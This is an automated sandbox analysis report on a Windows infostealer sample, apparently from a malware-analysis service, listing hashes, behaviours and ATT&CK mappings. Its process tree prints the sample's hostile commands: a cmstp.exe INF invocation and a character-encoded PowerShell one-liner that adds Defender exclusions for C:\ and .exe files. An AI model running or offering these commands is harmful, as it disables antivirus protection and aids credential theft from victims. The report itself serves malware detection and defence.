Analysis
-
max time kernel
93s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 23:55
Static task
static1
Behavioral task
behavioral1
Sample
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
Resource
win10v2004-20241007-en
General
-
Target
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe
-
Size
28KB
-
MD5
fc7028093f5b39048ecff77e49c0da2c
-
SHA1
d9f1a1e4c77205dc444d47a5ffb37cce725350c5
-
SHA256
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b
-
SHA512
260b5e123aff13f0ad6c13fb3536ae9fd4993181c00c85d813f99308ea83530b164a9bd5b4c733bdb1f19d9539b0dd13d2bfa92dbfac1c176e61a72402d8b458
-
SSDEEP
768:VOsOe+vfOM3ofGgTkqwsWQdNEgfavRVorMB75:VOsOeEO0FraavvT
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe -
Drops startup file 1 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe -
Executes dropped EXE 1 IoCs
Processes:
Sy.exepid process 656 Sy.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral2/memory/4760-7-0x000000001BA90000-0x000000001BB70000-memory.dmp agile_net -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
Processes:
Sy.exedescription ioc process Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Sy.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Sy.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1956 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exepid process 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exepowershell.exetaskkill.exeSy.exedescription pid process Token: SeDebugPrivilege 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe Token: SeDebugPrivilege 3180 powershell.exe Token: SeDebugPrivilege 1956 taskkill.exe Token: SeDebugPrivilege 656 Sy.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exepid process 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exedescription pid process target process PID 4760 wrote to memory of 2348 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe cmstp.exe PID 4760 wrote to memory of 2348 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe cmstp.exe PID 4760 wrote to memory of 656 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe Sy.exe PID 4760 wrote to memory of 656 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe Sy.exe PID 4760 wrote to memory of 656 4760 8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe Sy.exe -
outlook_office_path 1 IoCs
Processes:
Sy.exedescription ioc process Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe -
outlook_win_path 1 IoCs
Processes:
Sy.exedescription ioc process Key queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Sy.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"C:\Users\Admin\AppData\Local\Temp\8032da9c35a71beb5a5593ef71b2dfe8d6a7096c5b2a4d5e09e9468a4301c98b.exe"1⤵
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4760 -
\??\c:\windows\system32\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\A.inf2⤵PID:2348
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:656
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec bypass [char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')1⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1956
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
1Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5961df7710c27cd2a2452c11aa48ada24
SHA1081694e0067918b8355efef2cf72ef52d82e44b0
SHA256d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41
SHA51264f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
426KB
MD5d00a8f6a66f5fcaf18564b6f47831294
SHA1d1ae07fd6267b53264f1764cc45aafbfe9f5f763
SHA256a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039
SHA51299937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27